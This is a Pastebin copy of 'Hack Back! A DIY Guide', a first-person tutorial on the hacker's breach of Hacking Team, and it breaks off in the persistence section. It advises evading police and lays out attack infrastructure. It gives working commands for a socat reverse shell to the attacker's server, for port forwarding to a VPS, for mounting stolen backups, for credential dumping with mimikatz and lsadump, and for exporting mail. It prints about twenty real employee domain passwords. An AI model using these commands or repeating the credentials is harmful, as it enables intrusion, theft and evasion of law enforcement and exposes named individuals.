API tools faq
paste
Advertisement
Yunga

Hack Back! A DIY Guide

Yunga
Apr 20th, 2016
192
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 42.08 KB | None | 0 0
raw download clone embed print report diff
  1. _ _ _ ____ _ _
  2. | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
  3. | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
  4. | _ | (_| | (__| < | |_) | (_| | (__| <|_|
  5. |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
  6.  
  7. A DIY Guide
  8.  
  9.  
  10.  
  11. ,-._,-._
  12. _,-\ o O_/;
  13. / , ` `|
  14. | \-.,___, / `
  15. \ `-.__/ / ,.\
  16. / `-.__.-\` ./ \'
  17. / /| ___\ ,/ `\
  18. ( ( |.-"` '/\ \ `
  19. \ \/ ,, | \ _
  20. \| o/o / \.
  21. \ , / /
  22. ( __`;-;'__`) \\
  23. `//'` `||` `\
  24. _// || __ _ _ _____ __
  25. .-"-._,(__) .(__).-""-. | | | | |_ _| |
  26. / \ / \ | | |_| | | | |
  27. \ / \ / | | _ | | | |
  28. `'-------` `--------'` __| |_| |_| |_| |__
  29. #antisec
  30.  
  31.  
  32.  
  33. --[ 1 - Introduction ]----------------------------------------------------------
  34.  
  35. You'll notice the change in language since the last edition [1]. The
  36. English-speaking world already has tons of books, talks, guides, and
  37. info about hacking. In that world, there's plenty of hackers better than me,
  38. but they misuse their talents working for "defense" contractors, for intelligence
  39. agencies, to protect banks and corporations, and to defend the status quo.
  40. Hacker culture was born in the US as a counterculture, but that origin only
  41. remains in its aesthetics - the rest has been assimilated. At least they can
  42. wear a t-shirt, dye their hair blue, use their hacker names, and feel like
  43. rebels while they work for the Man.
  44.  
  45. You used to have to sneak into offices to leak documents [2]. You used to need
  46. a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4].
  47. Like the CNT said after the Gamma Group hack: "Let's take a step forward with
  48. new forms of struggle" [5]. Hacking is a powerful tool, let's learn and fight!
  49.  
  50. [1] http://pastebin.com/raw.php?i=cRYvK4jb
  51. [2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
  52. [3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
  53. [4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
  54. [5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group
  55.  
  56.  
  57. --[ 2 - Hacking Team ]----------------------------------------------------------
  58.  
  59. Hacking Team was a company that helped governments hack and spy on
  60. journalists, activists, political opposition, and other threats to their power
  61. [1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals
  62. and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the
  63. fascist slogan "boia chi molla". It'd be more correct to say "boia chi vende
  64. RCS". They also claimed to have technology to solve the "problem" posed by Tor
  65. and the darknet [13]. But seeing as I'm still free, I have my doubts about
  66. its effectiveness.
  67.  
  68. [1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
  69. [2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
  70. [3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
  71. [4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
  72. [5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
  73. [6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
  74. [7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
  75. [8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
  76. [9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
  77. [10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
  78. [11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
  79. [12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
  80. [13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web
  81.  
  82.  
  83. --[ 3 - Stay safe out there ]---------------------------------------------------
  84.  
  85. Unfortunately, our world is backwards. You get rich by doing bad things and go
  86. to jail for doing good. Fortunately, thanks to the hard work of people like
  87. the Tor project [1], you can avoid going to jail by taking a few simple
  88. precautions:
  89.  
  90. 1) Encrypt your hard disk [2]
  91.  
  92. I guess when the police arrive to seize your computer, it means you've
  93. already made a lot of mistakes, but it's better to be safe.
  94.  
  95. 2) Use a virtual machine with all traffic routed through Tor
  96.  
  97. This accomplishes two things. First, all your traffic is anonymized through
  98. Tor. Second, keeping your personal life and your hacking on separate
  99. computers helps you not to mix them by accident.
  100.  
  101. You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or
  102. something custom [6]. Here's [7] a detailed comparison.
  103.  
  104. 3) (Optional) Don't connect directly to Tor
  105.  
  106. Tor isn't a panacea. They can correlate the times you're connected to Tor
  107. with the times your hacker handle is active. Also, there have been
  108. successful attacks against Tor [8]. You can connect to Tor using other
  109. peoples' wifi. Wifislax [9] is a linux distro with a lot of tools for
  110. cracking wifi. Another option is to connect to a VPN or a bridge node [10]
  111. before Tor, but that's less secure because they can still correlate the
  112. hacker's activity with your house's internet activity (this was used as
  113. evidence against Jeremy Hammond [11]).
  114.  
  115. The reality is that while Tor isn't perfect, it works quite well. When I
  116. was young and reckless, I did plenty of stuff without any protection (I'm
  117. referring to hacking) apart from Tor, that the police tried their hardest
  118. to investigate, and I've never had any problems.
  119.  
  120. [1] https://www.torproject.org/
  121. [2] https://info.securityinabox.org/es/chapter-4
  122. [3] https://www.whonix.org/
  123. [4] https://tails.boum.org/
  124. [5] https://www.qubes-os.org/doc/privacy/torvm/
  125. [6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
  126. [7] https://www.whonix.org/wiki/Comparison_with_Others
  127. [8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
  128. [9] http://www.wifislax.com/
  129. [10] https://www.torproject.org/docs/bridges.html.en
  130. [11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html
  131.  
  132.  
  133. ----[ 3.1 - Infrastructure ]----------------------------------------------------
  134.  
  135. I don't hack directly from Tor exit nodes. They're on blacklists, they're
  136. slow, and they can't receive connect-backs. Tor protects my anonymity while I
  137. connect to the infrastructure I use to hack, which consists of:
  138.  
  139. 1) Domain Names
  140.  
  141. For C&C addresses, and for DNS tunnels for guaranteed egress.
  142.  
  143. 2) Stable Servers
  144.  
  145. For use as C&C servers, to receive connect-back shells, to launch attacks,
  146. and to store the loot.
  147.  
  148. 3) Hacked Servers
  149.  
  150. For use as pivots to hide the IP addresses of the stable servers. And for
  151. when I want a fast connection without pivoting, for example to scan ports,
  152. scan the whole internet, download a database with sqli, etc.
  153.  
  154. Obviously, you have to use an anonymous payment method, like bitcoin (if it's
  155. used carefully).
  156.  
  157.  
  158. ----[ 3.2 - Attribution ]-------------------------------------------------------
  159.  
  160. In the news we often see attacks traced back to government-backed hacking
  161. groups ("APTs"), because they repeatedly use the same tools, leave the same
  162. footprints, and even use the same infrastructure (domains, emails, etc).
  163. They're negligent because they can hack without legal consequences.
  164.  
  165. I didn't want to make the police's work any easier by relating my hack of
  166. Hacking Team with other hacks I've done or with names I use in my day-to-day
  167. work as a blackhat hacker. So, I used new servers and domain names, registered
  168. with new emails, and payed for with new bitcoin addresses. Also, I only used
  169. tools that are publicly available, or things that I wrote specifically for
  170. this attack, and I changed my way of doing some things to not leave my usual
  171. forensic footprint.
  172.  
  173.  
  174. --[ 4 - Information Gathering ]-------------------------------------------------
  175.  
  176. Although it can be tedious, this stage is very important, since the larger the
  177. attack surface, the easier it is to find a hole somewhere in it.
  178.  
  179.  
  180. ----[ 4.1 - Technical Information ]---------------------------------------------
  181.  
  182. Some tools and techniques are:
  183.  
  184. 1) Google
  185.  
  186. A lot of interesting things can be found with a few well-chosen search
  187. queries. For example, the identity of DPR [1]. The bible of Google hacking
  188. is the book "Google Hacking for Penetration Testers". You can find a short
  189. summary in Spanish at [2].
  190.  
  191. 2) Subdomain Enumeration
  192.  
  193. Often, a company's main website is hosted by a third party, and you'll find
  194. the company's actual IP range thanks to subdomains like mx.company.com or
  195. ns1.company.com. Also, sometimes there are things that shouldn't be exposed
  196. in "hidden" subdomains. Useful tools for discovering domains and subdomains
  197. are fierce [3], theHarvester [4], and recon-ng [5].
  198.  
  199. 3) Whois lookups and reverse lookups
  200.  
  201. With a reverse lookup using the whois information from a domain or IP range
  202. of a company, you can find other domains and IP ranges. As far as I know,
  203. there's no free way to do reverse lookups aside from a google "hack":
  204.  
  205. "via della moscova 13" site:www.findip-address.com
  206. "via della moscova 13" site:domaintools.com
  207.  
  208. 4) Port scanning and fingerprinting
  209.  
  210. Unlike the other techniques, this talks to the company's servers. I
  211. include it in this section because it's not an attack, it's just
  212. information gathering. The company's IDS might generate an alert, but you
  213. don't have to worry since the whole internet is being scanned constantly.
  214.  
  215. For scanning, nmap [6] is precise, and can fingerprint the majority of
  216. services discovered. For companies with very large IP ranges, zmap [7] or
  217. masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web
  218. sites.
  219.  
  220. [1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
  221. [2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
  222. [3] http://ha.ckers.org/fierce/
  223. [4] https://github.com/laramies/theHarvester
  224. [5] https://bitbucket.org/LaNMaSteR53/recon-ng
  225. [6] https://nmap.org/
  226. [7] https://zmap.io/
  227. [8] https://github.com/robertdavidgraham/masscan
  228. [9] http://www.morningstarsecurity.com/research/whatweb
  229. [10] http://blindelephant.sourceforge.net/
  230.  
  231.  
  232. ----[ 4.2 - Social Information ]------------------------------------------------
  233.  
  234. For social engineering, it's useful to have information about the employees,
  235. their roles, contact information, operating system, browser, plugins,
  236. software, etc. Some resources are:
  237.  
  238. 1) Google
  239.  
  240. Here as well, it's the most useful tool.
  241.  
  242. 2) theHarvester and recon-ng
  243.  
  244. I already mentioned them in the previous section, but they have a lot more
  245. functionality. They can find a lot of information quickly and
  246. automatically. It's worth reading all their documentation.
  247.  
  248. 3) LinkedIn
  249.  
  250. A lot of information about the employees can be found here. The company's
  251. recruiters are the most likely to accept your connection requests.
  252.  
  253. 4) Data.com
  254.  
  255. Previously known as jigsaw. They have contact information for many
  256. employees.
  257.  
  258. 5) File Metadata
  259.  
  260. A lot of information about employees and their systems can be found in
  261. metadata of files the company has published. Useful tools for finding
  262. files on the company's website and extracting the metadata are metagoofil
  263. [1] and FOCA [2].
  264.  
  265. [1] https://github.com/laramies/metagoofil
  266. [2] https://www.elevenpaths.com/es/labstools/foca-2/index.html
  267.  
  268.  
  269. --[ 5 - Entering the network ]--------------------------------------------------
  270.  
  271. There are various ways to get a foothold. Since the method I used against
  272. Hacking Team is uncommon and a lot more work than is usually necessary, I'll
  273. talk a little about the two most common ways, which I recommend trying first.
  274.  
  275.  
  276. ----[ 5.1 - Social Engineering ]------------------------------------------------
  277.  
  278. Social engineering, specifically spear phishing, is responsible for the
  279. majority of hacks these days. For an introduction in Spanish, see [1]. For
  280. more information in English, see [2] (the third part, "Targeted Attacks"). For
  281. fun stories about the social engineering exploits of past generations, see
  282. [3]. I didn't want to try to spear phish Hacking Team, as their whole business
  283. is helping governments spear phish their opponents, so they'd be much more
  284. likely to recognize and investigate a spear phishing attempt.
  285.  
  286. [1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
  287. [2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
  288. [3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf
  289.  
  290.  
  291. ----[ 5.2 - Buying Access ]-----------------------------------------------------
  292.  
  293. Thanks to hardworking Russians and their exploit kits, traffic sellers, and
  294. bot herders, many companies already have compromised computers in their
  295. networks. Almost all of the Fortune 500, with their huge networks, have some
  296. bots already inside. However, Hacking Team is a very small company, and most
  297. of it's employees are infosec experts, so there was a low chance that they'd
  298. already been compromised.
  299.  
  300.  
  301. ----[ 5.3 - Technical Exploitation ]--------------------------------------------
  302.  
  303. After the Gamma Group hack, I described a process for searching for
  304. vulnerabilities [1]. Hacking Team had one public IP range:
  305. inetnum: 93.62.139.32 - 93.62.139.47
  306. descr: HT public subnet
  307.  
  308. Hacking Team had very little exposed to the internet. For example, unlike
  309. Gamma Group, their customer support site needed a client certificate to
  310. connect. What they had was their main website (a Joomla blog in which Joomscan
  311. [2] didn't find anything serious), a mail server, a couple routers, two VPN
  312. appliances, and a spam filtering appliance. So, I had three options: look for
  313. a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the
  314. embedded devices. A 0day in an embedded device seemed like the easiest option,
  315. and after two weeks of work reverse engineering, I got a remote root exploit.
  316. Since the vulnerabilities still haven't been patched, I won't give more
  317. details, but for more information on finding these kinds of vulnerabilities,
  318. see [3] and [4].
  319.  
  320. [1] http://pastebin.com/raw.php?i=cRYvK4jb
  321. [2] http://sourceforge.net/projects/joomscan/
  322. [3] http://www.devttys0.com/
  323. [4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A
  324.  
  325.  
  326. --[ 6 - Be Prepared ]-----------------------------------------------------------
  327.  
  328. I did a lot of work and testing before using the exploit against Hacking Team.
  329. I wrote a backdoored firmware, and compiled various post-exploitation tools
  330. for the embedded device. The backdoor serves to protect the exploit. Using the
  331. exploit just once and then returning through the backdoor makes it harder to
  332. identify and patch the vulnerabilities.
  333.  
  334. The post-exploitation tools that I'd prepared were:
  335.  
  336. 1) busybox
  337.  
  338. For all the standard Unix utilities that the system didn't have.
  339.  
  340. 2) nmap
  341.  
  342. To scan and fingerprint Hacking Team's internal network.
  343.  
  344. 3) Responder.py
  345.  
  346. The most useful tool for attacking windows networks when you have access to
  347. the internal network, but no domain user.
  348.  
  349. 4) Python
  350.  
  351. To execute Responder.py
  352.  
  353. 5) tcpdump
  354.  
  355. For sniffing traffic.
  356.  
  357. 6) dsniff
  358.  
  359. For sniffing passwords from plaintext protocols like ftp, and for
  360. arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR
  361. and NaGA, but it was hard to compile it for the system.
  362.  
  363. 7) socat
  364.  
  365. For a comfortable shell with a pty:
  366. my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
  367. hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
  368. tcp:my_server:my_port
  369.  
  370. And useful for a lot more, it's a networking swiss army knife. See the
  371. examples section of its documentation.
  372.  
  373. 8) screen
  374.  
  375. Like the shell with pty, it wasn't really necessary, but I wanted to feel
  376. at home in Hacking Team's network.
  377.  
  378. 9) a SOCKS proxy server
  379.  
  380. To use with proxychains to be able to access their local network from any
  381. program.
  382.  
  383. 10) tgcd
  384.  
  385. For forwarding ports, like for the SOCKS server, through the firewall.
  386.  
  387. [1] https://www.busybox.net/
  388. [2] https://nmap.org/
  389. [3] https://github.com/SpiderLabs/Responder
  390. [4] https://github.com/bendmorris/static-python
  391. [5] http://www.tcpdump.org/
  392. [6] http://www.monkey.org/~dugsong/dsniff/
  393. [7] http://www.dest-unreach.org/socat/
  394. [8] https://www.gnu.org/software/screen/
  395. [9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
  396. [10] http://tgcd.sourceforge.net/
  397.  
  398.  
  399. The worst thing that could happen would be for my backdoor or post-exploitation
  400. tools to make the system unstable and cause an employee to investigate. So I
  401. spent a week testing my exploit, backdoor, and post-exploitation tools in the
  402. networks of other vulnerable companies before entering Hacking Team's network.
  403.  
  404.  
  405. --[ 7 - Watch and Listen ]------------------------------------------------------
  406.  
  407. Now inside their internal network, I wanted to take a look around and think
  408. about my next step. I started Responder.py in analysis mode (-A to listen
  409. without sending poisoned responses), and did a slow scan with nmap.
  410.  
  411.  
  412. --[ 8 - NoSQL Databases ]-------------------------------------------------------
  413.  
  414. NoSQL, or rather NoAuthentication, has been a huge gift to the hacker
  415. community [1]. Just when I was worried that they'd finally patched all of the
  416. authentication bypass bugs in MySQL [2][3][4][5], new databases came into
  417. style that lack authentication by design. Nmap found a few in Hacking Team's
  418. internal network:
  419.  
  420. 27017/tcp open mongodb MongoDB 2.6.5
  421. | mongodb-databases:
  422. | ok = 1
  423. | totalSizeMb = 47547
  424. | totalSize = 49856643072
  425. ...
  426. |_ version = 2.6.5
  427.  
  428. 27017/tcp open mongodb MongoDB 2.6.5
  429. | mongodb-databases:
  430. | ok = 1
  431. | totalSizeMb = 31987
  432. | totalSize = 33540800512
  433. | databases
  434. ...
  435. |_ version = 2.6.5
  436.  
  437. They were the databases for test instances of RCS. The audio that RCS records
  438. is stored in MongoDB with GridFS. The audio folder in the torrent [6] came
  439. from this. They were spying on themselves without meaning to.
  440.  
  441. [1] https://www.shodan.io/search?query=product%3Amongodb
  442. [2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
  443. [3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
  444. [4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
  445. [5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
  446. [6] https://ht.transparencytoolkit.org/audio/
  447.  
  448.  
  449. --[ 9 - Crossed Cables ]--------------------------------------------------------
  450.  
  451. Although it was fun to listen to recordings and see webcam images of Hacking
  452. Team developing their malware, it wasn't very useful. Their insecure backups
  453. were the vulnerability that opened their doors. According to their
  454. documentation [1], their iSCSI devices were supposed to be on a separate
  455. network, but nmap found a few in their subnetwork 192.168.1.200/24:
  456.  
  457. Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
  458. ...
  459. 3260/tcp open iscsi?
  460. | iscsi-info:
  461. | Target: iqn.2000-01.com.synology:ht-synology.name
  462. | Address: 192.168.200.66:3260,0
  463. |_ Authentication: No authentication required
  464.  
  465. Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
  466. ...
  467. 3260/tcp open iscsi?
  468. | iscsi-info:
  469. | Target: iqn.2000-01.com.synology:synology-backup.name
  470. | Address: 10.0.1.72:3260,0
  471. | Address: 192.168.200.72:3260,0
  472. |_ Authentication: No authentication required
  473.  
  474. iSCSI needs a kernel module, and it would've been difficult to compile it for
  475. the embedded system. I forwarded the port so that I could mount it from a VPS:
  476.  
  477. VPS: tgcd -L -p 3260 -q 42838
  478. Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838
  479.  
  480. VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1
  481.  
  482. Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it
  483. because it thinks its IP is 192.168.200.72 instead of 127.0.0.1
  484.  
  485. The way I solved it was:
  486. iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1
  487.  
  488. And now, after:
  489. iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login
  490.  
  491. ...the device file appears! We mount it:
  492. vmfs-fuse -o ro /dev/sdb1 /mnt/tmp
  493.  
  494. and find backups of various virtual machines. The Exchange server seemed like
  495. the most interesting. It was too big too download, but it was possible to
  496. mount it remotely to look for interesting files:
  497. $ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
  498. $ fdisk -l /dev/loop0
  499. /dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT
  500.  
  501. so the offset is 2048 * 512 = 1048576
  502. $ losetup -o 1048576 /dev/loop1 /dev/loop0
  503. $ mount -o ro /dev/loop1 /mnt/exchange/
  504.  
  505. now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
  506. we find the hard disk of the VM, and mount it:
  507. vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
  508. mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1
  509.  
  510. ...and finally we've unpacked the Russian doll and can see all the files from
  511. the old Exchange server in /mnt/part1
  512.  
  513. [1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf
  514.  
  515.  
  516. --[ 10 - From backups to domain admin ]-----------------------------------------
  517.  
  518. What interested me most in the backup was seeing if it had a password or hash
  519. that could be used to access the live server. I used pwdump, cachedump, and
  520. lsadump [1] on the registry hives. lsadump found the password to the besadmin
  521. service account:
  522.  
  523. _SC_BlackBerry MDS Connection Service
  524. 0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
  525. 0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
  526. 0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........
  527.  
  528. I used proxychains [2] with the socks server on the embedded device and
  529. smbclient [3] to check the password:
  530. proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'
  531.  
  532. It worked! The password for besadmin was still valid, and a local admin. I
  533. used my proxy and metasploit's psexec_psh [4] to get a meterpreter session.
  534. Then I migrated to a 64 bit process, ran "load kiwi" [5], "creds_wdigest", and
  535. got a bunch of passwords, including the Domain Admin:
  536.  
  537. HACKINGTEAM BESAdmin bes32678!!!
  538. HACKINGTEAM Administrator uu8dd8ndd12!
  539. HACKINGTEAM c.pozzi P4ssword <---- lol great sysadmin
  540. HACKINGTEAM m.romeo ioLK/(90
  541. HACKINGTEAM l.guerra 4luc@=.=
  542. HACKINGTEAM d.martinez W4tudul3sp
  543. HACKINGTEAM g.russo GCBr0s0705!
  544. HACKINGTEAM a.scarafile Cd4432996111
  545. HACKINGTEAM r.viscardi Ht2015!
  546. HACKINGTEAM a.mino A!e$$andra
  547. HACKINGTEAM m.bettini Ettore&Bella0314
  548. HACKINGTEAM m.luppi Blackou7
  549. HACKINGTEAM s.gallucci 1S9i8m4o!
  550. HACKINGTEAM d.milan set!dob66
  551. HACKINGTEAM w.furlan Blu3.B3rry!
  552. HACKINGTEAM d.romualdi Rd13136f@#
  553. HACKINGTEAM l.invernizzi L0r3nz0123!
  554. HACKINGTEAM e.ciceri 2O2571&2E
  555. HACKINGTEAM e.rabe erab@4HT!
  556.  
  557. [1] https://github.com/Neohapsis/creddump7
  558. [2] http://proxychains.sourceforge.net/
  559. [3] https://www.samba.org/
  560. [4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
  561. [5] https://github.com/gentilkiwi/mimikatz
  562.  
  563.  
  564. --[ 11 - Downloading the mail ]-------------------------------------------------
  565.  
  566. With the Domain Admin password, I have access to the email, the heart of the
  567. company. Since with each step I take there's a chance of being detected, I
  568. start downloading their email before continuing to explore. Powershell makes
  569. it easy [1]. Curiously, I found a bug with Powershell's date handling. After
  570. downloading the emails, it took me another couple weeks to get access to the
  571. source code and everything else, so I returned every now and then to download
  572. the new emails. The server was Italian, with dates in the format
  573. day/month/year. I used:
  574. -ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}
  575.  
  576. with New-MailboxExportRequest to download the new emails (in this case all
  577. mail since June 5). The problem is it says the date is invalid if you
  578. try a day larger than 12 (I imagine because in the US the month comes first
  579. and you can't have a month above 12). It seems like Microsoft's engineers only
  580. test their software with their own locale.
  581.  
  582. [1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/
  583.  
  584.  
  585. --[ 12 - Downloading Files ]----------------------------------------------------
  586.  
  587. Now that I'd gotten Domain Admin, I started to download file shares using my
  588. proxy and the -Tc option of smbclient, for example:
  589.  
  590. proxychains smbclient '//192.168.1.230/FAE DiskStation' \
  591. -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'
  592.  
  593. I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in
  594. the torrent like that.
  595.  
  596.  
  597. --[ 13 - Introduction to hacking windows domains ]------------------------------
  598.  
  599. Before continuing with the story of the "weones culiaos" (Hacking Team), I
  600. should give some general knowledge for hacking windows networks.
  601.  
  602.  
  603. ----[ 13.1 - Lateral Movement ]-------------------------------------------------
  604.  
  605. I'll give a brief review of the different techniques for spreading withing a
  606. windows network. The techniques for remote execution require the password or
  607. hash of a local admin on the target. By far, the most common way of obtaining
  608. those credentials is using mimikatz [1], especially sekurlsa::logonpasswords
  609. and sekurlsa::msv, on the computers where you already have admin access. The
  610. techniques for "in place" movement also require administrative privileges
  611. (except for runas). The most important tools for privilege escalation are
  612. PowerUp [2], and bypassuac [3].
  613.  
  614. [1] https://adsecurity.org/?page_id=1821
  615. [2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
  616. [3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1
  617.  
  618.  
  619. Remote Movement:
  620.  
  621. 1) psexec
  622.  
  623. The tried and true method for lateral movement on windows. You can use
  624. psexec [1], winexe [2], metasploit's psexec_psh [3], Powershell Empire's
  625. invoke_psexec [4], or the builtin windows command "sc" [5]. For the
  626. metasploit module, powershell empire, and pth-winexe [6], you just need the
  627. hash, not the password. It's the most universal method (it works on any
  628. windows computer with port 445 open), but it's also the least stealthy.
  629. Event type 7045 "Service Control Manager" will appear in the event logs. In
  630. my experience, no one has ever noticed during a hack, but it helps the
  631. investigators piece together what the hacker did afterwards.
  632.  
  633. 2) WMI
  634.  
  635. The most stealthy method. The WMI service is enabled on all windows
  636. computers, but except for servers, the firewall blocks it by default. You
  637. can use wmiexec.py [7], pth-wmis [6] (here's a demonstration of wmiexec and
  638. pth-wmis [8]), Powershell Empire's invoke_wmi [9], or the windows builtin
  639. wmic [5]. All except wmic just need the hash.
  640.  
  641. 3) PSRemoting [10]
  642.  
  643. It's disabled by default, and I don't recommend enabling new protocols.
  644. But, if the sysadmin has already enabled it, it's very convenient,
  645. especially if you use powershell for everything (and you should use
  646. powershell for almost everything, it will change [11] with powershell 5 and
  647. windows 10, but for now powershell makes it easy to do everything in RAM,
  648. avoid AV, and leave a small footprint)
  649.  
  650. 4) Scheduled Tasks
  651.  
  652. You can execute remote programs with at and schtasks [5]. It works in the
  653. same situations where you could use psexec, and it also leaves a well known
  654. footprint [12].
  655.  
  656. 5) GPO
  657.  
  658. If all those protocols are disabled or blocked by the firewall, once you're
  659. Domain Admin, you can use GPO to give users a login script, install an msi,
  660. execute a scheduled task [13], or, like we'll see with the computer of
  661. Mauro Romeo (one of Hacking Team's sysadmins), use GPO to enable WMI and
  662. open the firewall.
  663.  
  664. [1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
  665. [2] https://sourceforge.net/projects/winexe/
  666. [3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
  667. [4] http://www.powershellempire.com/?page_id=523
  668. [5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
  669. [6] https://github.com/byt3bl33d3r/pth-toolkit
  670. [7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
  671. [8] https://www.trustedsec.com/june-2015/no_psexec_needed/
  672. [9] http://www.powershellempire.com/?page_id=124
  673. [10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
  674. [11] https://adsecurity.org/?p=2277
  675. [12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
  676. [13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py
  677.  
  678.  
  679. "In place" Movement:
  680.  
  681. 1) Token Stealing
  682.  
  683. Once you have admin access on a computer, you can use the tokens of the
  684. other users to access resources in the domain. Two tools for doing this are
  685. incognito [1] and the mimikatz token::* commands [2].
  686.  
  687. 2) MS14-068
  688.  
  689. You can take advantage of a validation bug in Kerberos to generate Domain
  690. Admin tickets [3][4][5].
  691.  
  692. 3) Pass the Hash
  693.  
  694. If you have a user's hash, but they're not logged in, you can use
  695. sekurlsa::pth [2] to get a ticket for the user.
  696.  
  697. 4) Process Injection
  698.  
  699. Any RAT can inject itself into other processes. For example, the migrate
  700. command in meterpreter and pupy [6], or the psinject [7] command in
  701. powershell empire. You can inject into the process that has the token you
  702. want.
  703.  
  704. 5) runas
  705.  
  706. This is sometimes very useful since it doesn't require admin privileges.
  707. The command is part of windows, but if you don't have a GUI you can use
  708. powershell [8].
  709.  
  710. [1] https://www.indetectables.net/viewtopic.php?p=211165
  711. [2] https://adsecurity.org/?page_id=1821
  712. [3] https://github.com/bidord/pykek
  713. [4] https://adsecurity.org/?p=676
  714. [5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
  715. [6] https://github.com/n1nj4sec/pupy
  716. [7] http://www.powershellempire.com/?page_id=273
  717. [8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1
  718.  
  719.  
  720. ----[ 13.2 - Persistence ]------------------------------------------------------
  721.  
  722. Once you have access, you want to keep it. Really, persistence is only a
  723. challenge for assholes like Hacking Team who target activists and other
  724. individuals. To hack companies, persistence isn't needed since companies never
  725. sleep. I always use Duqu 2 style "persistence", executing in RAM on a couple
